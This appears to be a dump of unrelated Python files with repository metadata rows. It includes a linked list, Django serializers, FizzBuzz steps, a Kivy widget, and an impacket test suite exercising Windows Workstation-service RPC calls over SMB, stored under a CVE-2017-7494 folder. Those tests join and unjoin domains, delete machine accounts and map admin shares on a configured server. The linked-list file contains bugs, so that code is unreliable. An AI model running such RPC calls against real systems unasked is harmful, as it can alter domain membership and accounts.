| 34.986301 | 116 | 0.703406 | 551 | 5,108 | 6.46098 | 0.22323 | 0.10618 | 0.096067 | 0.138483 | 0.449438 | 0.386798 | 0.241854 | 0.208708 | 0.105337 | 0 | 0 | 0.008495 | 0.193422 | 5,108 | 145 | 117 | 35.227586 | 0.855583 | 0.081832 | 0 | 0.09375 | 0 | 0 | 0.01304 | 0.007482 | 0 | 0 | 0 | 0 | 0 | 1 | 0.260417 | false | 0 | 0.0625 | 0.041667 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
37db76547d8110396ec9581a4b91dcffc5efc57c | 2,928 | py | Python | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | from doubly_linked_base import _DoublyLinkedBase
class PositionalList(_DoublyLinkedBase):
class Position:
def __init__(self, container, node):
self._container = container
self._node = node
def element(self):
return self._node._element
def __eq__(self, other):
return type(other) is type(self) and other._node is self._node
def __ne__(self, other):
return not (self == other)
def _validate(self, p):
if not isinstance(p, self.Position):
raise TypeError('p must be proper Position type')
if p._container is not self:
raise ValueError('p does not belong to this container')
if p._node._next is None:
raise ValueError('p is no longer valid')
return p._node
def _make_position(self, node):
if node is self._header or node is self._trailer:
return None
else:
return self.Position(self, node)
def first(self):
return self._make_position(self._header._next)
def last(self):
return self._make_position(self._trailer._prev)
def before(self, p):
node = self._validate(p)
return self._make_position(node._prev)
def after(self, p):
node = self._validate(p)
return self._make_position(node._next)
def __iter__(self):
cursor = self.first()
while cursor is not None:
yield cursor.element()
cursor = self.after(cursor)
def _insert_between(self, e, predecessor, successor):
node = super()._insert_between(e, predecessor, successor)
return self._make_position(node)
def add_first(self, e):
return self._insert_between(e, self._header, self._header._next)
def add_last(self, e):
return self._insert_between(e, self._trailer._prev, self._trailer)
def add_before(self, p, e):
original = self._validate(p)
return self._insert_between(e, original._pre, original)
def add_after(self, p, e):
original = self._validate(p)
return self._insert_between(e, original, original._next)
def delete(self, p):
original = self._validate(p)
return self._delete_node(original)
def replace(self, p, e):
original = self._validate(p)
old_value = original._element
original._element = e
return old_value
def insertion_sort(L: PositionalList):
if len(L) > 1:
marker = L.first()
while marker != L.last():
pivot = L.after(marker)
value = pivot.element()
if value > marker.element():
marker = pivot
else:
walk = marker
while walk != L.first() and L.before(walk):
walk = L.before(walk)
L.delete(pivot)
L.add_before(walk, value)
| 30.185567 | 74 | 0.597678 | 360 | 2,928 | 4.613889 | 0.213889 | 0.072246 | 0.04696 | 0.066225 | 0.255268 | 0.239615 | 0.184828 | 0.168573 | 0.128838 | 0.128838 | 0 | 0.000493 | 0.307036 | 2,928 | 96 | 75 | 30.5 | 0.818137 | 0 | 0 | 0.106667 | 0 | 0 | 0.02903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.253333 | false | 0 | 0.013333 | 0.093333 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
37de836331151d39b86c391461ff4467bd638ded | 83 | py | Python | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | 1 | 2021-03-09T20:09:48.000Z | 2021-03-09T20:09:48.000Z | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | 20 | 2021-03-02T14:24:46.000Z | 2021-03-10T17:07:07.000Z | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Contains version information"""
__version__ = "0.7.9"
| 13.833333 | 34 | 0.60241 | 10 | 83 | 4.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.156627 | 83 | 5 | 35 | 16.6 | 0.6 | 0.614458 | 0 | 0 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37df3726bb6459826a47732c8e4fe5d4be28aca7 | 1,773 | py | Python | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | 1 | 2019-11-08T12:43:58.000Z | 2019-11-08T12:43:58.000Z | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | null | null | null | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | null | null | null | from rest_framework import serializers
from .models import Post, Category, Tag
from django.contrib.auth.models import User, AnonymousUser
class CategorySerializer(serializers.ModelSerializer):
"""
分类序列化
"""
owner = serializers.ReadOnlyField(source='owner.username')
# article = serializers.ReadOnlyField(source='article.pk')
class Meta:
model = Category
fields = ('id', 'name', 'is_nav', 'created_time', 'owner', 'article')
class NavSerializer(serializers.ModelSerializer):
"""
分类序列化
"""
owner = serializers.ReadOnlyField(source='owner.username')
# def update(self, instance, validated_data):
# print(instance)
# return instance
# article = serializers.ReadOnlyField(source='article.pk')
class Meta:
model = Category
fields = ('id', 'name', 'is_nav', 'created_time', 'owner', 'article')
class PostSerializer(serializers.ModelSerializer):
"""
文章序列化
"""
owner = serializers.ReadOnlyField(source='owner.username')
category_id = serializers.ReadOnlyField(source='category.id')
comment = serializers.ReadOnlyField(source='comment.count')
category_name = serializers.ReadOnlyField(source='category.name')
class Meta:
model = Post
fields = ('id', 'title', 'desc', 'content',
'status', 'category', 'tag', 'created_time', 'owner', 'is_md', 'content_html', 'comment',
'category_name', 'category_id')
depth = 1
class TagSerializer(serializers.ModelSerializer):
owner = serializers.ReadOnlyField(source='owner.username')
class Meta:
model = Tag
fields = ('id', 'name', 'owner', 'article',
'status', 'created_time')
# TODO 迁移到User目录 √
| 28.142857 | 107 | 0.645234 | 171 | 1,773 | 6.614035 | 0.339181 | 0.190981 | 0.238727 | 0.123784 | 0.424403 | 0.424403 | 0.339523 | 0.339523 | 0.339523 | 0.199823 | 0 | 0.000723 | 0.219402 | 1,773 | 62 | 108 | 28.596774 | 0.815751 | 0.131416 | 0 | 0.4 | 0 | 0 | 0.202149 | 0 | 0 | 0 | 0 | 0.016129 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37e46f52dc162b86ab770d0b8bdc6f05e2c1d529 | 1,243 | py | Python | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | from behave import *
from assertpy import *
from src.zad01.fizzbuzz import FizzBuzz
@given('instance of FizzBuzz')
def step_impl(context):
context.fizzbuzz = FizzBuzz()
@when('we input number 15')
def step_impl(context):
context.result = context.fizzbuzz.game(15)
@then('game will return FizzBuzz')
def step_impl(context):
assert_that(context.result).is_equal_to("FizzBuzz")
@when('we input number 3')
def step_impl(context):
context.result = context.fizzbuzz.game(3)
@then('game will return Fizz')
def step_impl(context):
assert_that(context.result).is_equal_to("Fizz")
@when('we input number 5')
def step_impl(context):
context.result = context.fizzbuzz.game(5)
@then('game will return Buzz')
def step_impl(context):
assert_that(context.result).is_equal_to("Buzz")
@when('we input number 1')
def step_impl(context):
context.result = context.fizzbuzz.game(1)
@then('game will return 1')
def step_impl(context):
assert_that(context.result).is_equal_to(1)
@when('we input string "text"')
def step_impl(context):
context.result = context.fizzbuzz.game("text")
@then('game will return "Wrong type!"')
def step_impl(context):
assert_that(context.result).is_equal_to("Wrong type!")
| 21.067797 | 58 | 0.726468 | 185 | 1,243 | 4.740541 | 0.205405 | 0.087799 | 0.13797 | 0.22577 | 0.676169 | 0.570125 | 0.570125 | 0.570125 | 0.570125 | 0.285063 | 0 | 0.013023 | 0.135157 | 1,243 | 58 | 59 | 21.431034 | 0.802791 | 0 | 0 | 0.305556 | 0 | 0 | 0.206758 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.305556 | false | 0 | 0.083333 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37e7ab4f9371204ff19e3279bb585a8f76511b31 | 19,344 | py | Python | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 201 | 2017-04-06T20:19:18.000Z | 2022-03-25T06:39:53.000Z | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 8 | 2017-12-31T01:45:54.000Z | 2021-06-08T19:35:58.000Z | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 46 | 2017-04-07T18:59:07.000Z | 2022-03-07T08:55:40.000Z | ###############################################################################
# Tested so far:
#
# NetrWkstaGetInfo
# NetrWkstaUserEnum
# NetrWkstaTransportEnum
# NetrWkstaTransportAdd
# NetrUseAdd
# NetrUseGetInfo
# NetrUseDel
# NetrUseEnum
# NetrWorkstationStatisticsGet
# NetrGetJoinInformation
# NetrJoinDomain2
# NetrUnjoinDomain2
# NetrRenameMachineInDomain2
# NetrValidateName2
# NetrGetJoinableOUs2
# NetrAddAlternateComputerName
# NetrRemoveAlternateComputerName
# NetrSetPrimaryComputerName
# NetrEnumerateComputerNames
#
# Not yet:
#
# Shouldn't dump errors against a win7
#
################################################################################
import unittest
import ConfigParser
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5 import wkst
from impacket.dcerpc.v5.ndr import NULL
class WKSTTests(unittest.TestCase):
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.ts)
return dce, rpctransport
def test_NetrWkstaGetInfo(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaGetInfo()
request['ServerName'] = '\x00'*10
request['Level'] = 100
resp = dce.request(request)
resp.dump()
request['Level'] = 101
resp = dce.request(request)
resp.dump()
request['Level'] = 102
resp = dce.request(request)
resp.dump()
request['Level'] = 502
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaGetInfo(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaGetInfo(dce, 100)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 101)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 102)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
def test_NetrWkstaUserEnum(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaUserEnum()
request['ServerName'] = '\x00'*10
request['UserInfo']['Level'] = 0
request['UserInfo']['WkstaUserInfo']['tag'] = 0
request['PreferredMaximumLength'] = 8192
resp = dce.request(request)
resp.dump()
request['UserInfo']['Level'] = 1
request['UserInfo']['WkstaUserInfo']['tag'] = 1
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaUserEnum(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaUserEnum(dce, 0)
resp.dump()
resp = wkst.hNetrWkstaUserEnum(dce, 1)
resp.dump()
def test_NetrWkstaTransportEnum(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaTransportEnum()
request['ServerName'] = '\x00'*10
request['TransportInfo']['Level'] = 0
request['TransportInfo']['WkstaTransportInfo']['tag'] = 0
request['PreferredMaximumLength'] = 500
request['ResumeHandle'] = NULL
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaTransportEnum(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaTransportEnum(dce, 0)
resp.dump()
def test_NetrWkstaSetInfo(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaGetInfo()
request['ServerName'] = '\x00'*10
request['Level'] = 502
resp = dce.request(request)
resp.dump()
oldVal = resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit']
req = wkst.NetrWkstaSetInfo()
req['ServerName'] = '\x00'*10
req['Level'] = 502
req['WkstaInfo'] = resp['WkstaInfo']
req['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = 500
resp2 = dce.request(req)
resp2.dump()
resp = dce.request(request)
self.assertTrue(500 == resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] )
req['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = oldVal
resp2 = dce.request(req)
resp2.dump()
def test_hNetrWkstaSetInfo(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
oldVal = resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit']
resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = 500
resp2 = wkst.hNetrWkstaSetInfo(dce, 502,resp['WkstaInfo']['WkstaInfo502'])
resp2.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
self.assertTrue(500 == resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] )
resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = oldVal
resp2 = wkst.hNetrWkstaSetInfo(dce, 502,resp['WkstaInfo']['WkstaInfo502'])
resp2.dump()
def test_NetrWkstaTransportAdd(self):
dce, rpctransport = self.connect()
req = wkst.NetrWkstaTransportAdd()
req['ServerName'] = '\x00'*10
req['Level'] = 0
req['TransportInfo']['wkti0_transport_name'] = 'BETO\x00'
req['TransportInfo']['wkti0_transport_address'] = '000C29BC5CE5\x00'
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_FUNCTION') < 0:
raise
def test_hNetrUseAdd_hNetrUseDel_hNetrUseGetInfo_hNetrUseEnum(self):
dce, rpctransport = self.connect()
info1 = wkst.LPUSE_INFO_1()
info1['ui1_local'] = 'Z:\x00'
info1['ui1_remote'] = '\\\\127.0.0.1\\c$\x00'
info1['ui1_password'] = NULL
resp = wkst.hNetrUseAdd(dce, 1, info1)
resp.dump()
# We're not testing this call with NDR64, it fails and I can't see the contents
if self.ts == ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'):
return
resp = wkst.hNetrUseEnum(dce, 2)
resp.dump()
resp2 = wkst.hNetrUseGetInfo(dce, 'Z:', 3)
resp2.dump()
resp = wkst.hNetrUseDel(dce,'Z:')
resp.dump()
def test_NetrUseAdd_NetrUseDel_NetrUseGetInfo_NetrUseEnum(self):
dce, rpctransport = self.connect()
req = wkst.NetrUseAdd()
req['ServerName'] = '\x00'*10
req['Level'] = 1
req['InfoStruct']['tag'] = 1
req['InfoStruct']['UseInfo1']['ui1_local'] = 'Z:\x00'
req['InfoStruct']['UseInfo1']['ui1_remote'] = '\\\\127.0.0.1\\c$\x00'
req['InfoStruct']['UseInfo1']['ui1_password'] = NULL
resp2 = dce.request(req)
resp2.dump()
# We're not testing this call with NDR64, it fails and I can't see the contents
if self.ts == ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'):
return
req = wkst.NetrUseEnum()
req['ServerName'] = NULL
req['InfoStruct']['Level'] = 2
req['InfoStruct']['UseInfo']['tag'] = 2
req['InfoStruct']['UseInfo']['Level2']['Buffer'] = NULL
req['PreferredMaximumLength'] = 0xffffffff
req['ResumeHandle'] = NULL
resp2 = dce.request(req)
resp2.dump()
req = wkst.NetrUseGetInfo()
req['ServerName'] = '\x00'*10
req['UseName'] = 'Z:\x00'
req['Level'] = 3
resp2 = dce.request(req)
resp2.dump()
req = wkst.NetrUseDel()
req['ServerName'] = '\x00'*10
req['UseName'] = 'Z:\x00'
req['ForceLevel'] = wkst.USE_LOTS_OF_FORCE
resp2 = dce.request(req)
resp2.dump()
def test_NetrWorkstationStatisticsGet(self):
dce, rpctransport = self.connect()
req = wkst.NetrWorkstationStatisticsGet()
req['ServerName'] = '\x00'*10
req['ServiceName'] = '\x00'
req['Level'] = 0
req['Options'] = 0
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrWorkstationStatisticsGet(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrWorkstationStatisticsGet(dce, '\x00', 0, 0)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrGetJoinInformation(self):
dce, rpctransport = self.connect()
req = wkst.NetrGetJoinInformation()
req['ServerName'] = '\x00'*10
req['NameBuffer'] = '\x00'
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrGetJoinInformation(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrGetJoinInformation(dce, '\x00')
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrJoinDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrJoinDomain2()
req['ServerName'] = '\x00'*10
req['DomainNameParam'] = '172.16.123.1\\FREEFLY\x00'
req['MachineAccountOU'] = 'OU=BETUS,DC=FREEFLY\x00'
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
req['Options'] = wkst.NETSETUP_DOMAIN_JOIN_IF_JOINED
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrJoinDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrJoinDomain2(dce,'172.16.123.1\\FREEFLY\x00','OU=BETUS,DC=FREEFLY\x00',NULL,'\x00'*512, wkst.NETSETUP_DOMAIN_JOIN_IF_JOINED)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrUnjoinDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrUnjoinDomain2()
req['ServerName'] = '\x00'*10
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
#req['Password'] = NULL
req['Options'] = wkst.NETSETUP_ACCT_DELETE
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrUnjoinDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrUnjoinDomain2(dce, NULL, '\x00'*512, wkst.NETSETUP_ACCT_DELETE)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrRenameMachineInDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrRenameMachineInDomain2()
req['ServerName'] = '\x00'*10
req['MachineName'] = 'BETUS\x00'
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
#req['Password'] = NULL
req['Options'] = wkst.NETSETUP_ACCT_CREATE
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrRenameMachineInDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrRenameMachineInDomain2(dce, 'BETUS\x00', NULL, '\x00'*512, wkst.NETSETUP_ACCT_CREATE)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrValidateName2(self):
dce, rpctransport = self.connect()
req = wkst.NetrValidateName2()
req['ServerName'] = '\x00'*10
req['NameToValidate'] = 'BETO\x00'
req['AccountName'] = NULL
req['Password'] = NULL
req['NameType'] = wkst.NETSETUP_NAME_TYPE.NetSetupDomain
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_hNetrValidateName2(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrValidateName2(dce, 'BETO\x00', NULL, NULL, wkst.NETSETUP_NAME_TYPE.NetSetupDomain)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_NetrGetJoinableOUs2(self):
dce, rpctransport = self.connect()
req = wkst.NetrGetJoinableOUs2()
req['ServerName'] = '\x00'*10
req['DomainNameParam'] = 'FREEFLY\x00'
req['AccountName'] = NULL
req['Password'] = NULL
req['OUCount'] = 0
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_hNetrGetJoinableOUs2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrGetJoinableOUs2(dce,'FREEFLY\x00', NULL, NULL,0 )
resp.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_NetrAddAlternateComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrAddAlternateComputerName()
req['ServerName'] = '\x00'*10
req['AlternateName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrAddAlternateComputerName(self):
dce, rpctransport = self.connect()
try:
resp2= wkst.hNetrAddAlternateComputerName(dce, 'FREEFLY\x00', NULL, NULL)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrRemoveAlternateComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrRemoveAlternateComputerName()
req['ServerName'] = '\x00'*10
req['AlternateName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrRemoveAlternateComputerName(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrRemoveAlternateComputerName(dce,'FREEFLY\x00', NULL, NULL )
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrSetPrimaryComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrSetPrimaryComputerName()
req['ServerName'] = '\x00'*10
req['PrimaryName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrSetPrimaryComputerName(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrSetPrimaryComputerName(dce,'FREEFLY\x00', NULL, NULL )
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrEnumerateComputerNames(self):
dce, rpctransport = self.connect()
req = wkst.NetrEnumerateComputerNames()
req['ServerName'] = '\x00'*10
req['NameType'] = wkst.NET_COMPUTER_NAME_TYPE.NetAllComputerNames
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
raise
def test_hNetrEnumerateComputerNames(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrEnumerateComputerNames(dce,wkst.NET_COMPUTER_NAME_TYPE.NetAllComputerNames)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
raise
class SMBTransport(WKSTTests):
def setUp(self):
WKSTTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.stringBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.machine
self.ts = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
class SMBTransport64(WKSTTests):
def setUp(self):
WKSTTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.stringBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.machine
self.ts = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
# Process command-line arguments.
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
testcase = sys.argv[1]
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[testcase])
else:
suite = unittest.TestLoader().loadTestsFromTestCase(SMBTransport)
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(SMBTransport64))
unittest.TextTestRunner(verbosity=1).run(suite)
| 33.52513 | 152 | 0.586125 | 1,926 | 19,344 | 5.798027 | 0.135514 | 0.047014 | 0.056148 | 0.067968 | 0.647354 | 0.607415 | 0.562819 | 0.497806 | 0.39966 | 0.373511 | 0 | 0.043491 | 0.277295 | 19,344 | 576 | 153 | 33.583333 | 0.755293 | 0.04177 | 0 | 0.648649 | 0 | 0 | 0.167148 | 0.054589 | 0 | 0 | 0.002727 | 0 | 0.004505 | 0 | null | null | 0.051802 | 0.013514 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
37f34a605a38158fa9015595b01c813e49baa7a2 | 656 | py | Python | kivy/uix/stencilview.py | hansent/kivy | fdd0ff3b5db127ec53f9b37e8666a4bd77e5b983 | [
"MIT"
] | 2 | 2015-10-26T12:35:37.000Z | 2020-11-26T12:06:09.000Z | kivy/uix/stencilview.py | 5y/kivy | 6bee66946f5434ca92921a8bc9559d82ec955896 | [
"MIT"
] | null | null | null | kivy/uix/stencilview.py | 5y/kivy | 6bee66946f5434ca92921a8bc9559d82ec955896 | [
"MIT"
] | 3 | 2015-07-18T11:03:59.000Z | 2018-03-17T01:32:42.000Z | '''
Stencil View
============
.. versionadded:: 1.0.4
:class:`StencilView` limits the drawing of child widgets to the StencilView's
bounding box. Any drawing outside the bounding box will be clipped (trashed).
The StencilView uses the stencil graphics instructions under the hood. It
provides an efficient way to clip the drawing area of children.
.. note::
As with the stencil graphics instructions, you cannot stack more than 8
stencil-aware widgets.
'''
__all__ = ('StencilView', )
from kivy.uix.widget import Widget
class StencilView(Widget):
'''StencilView class. See module documentation for more information.
'''
pass
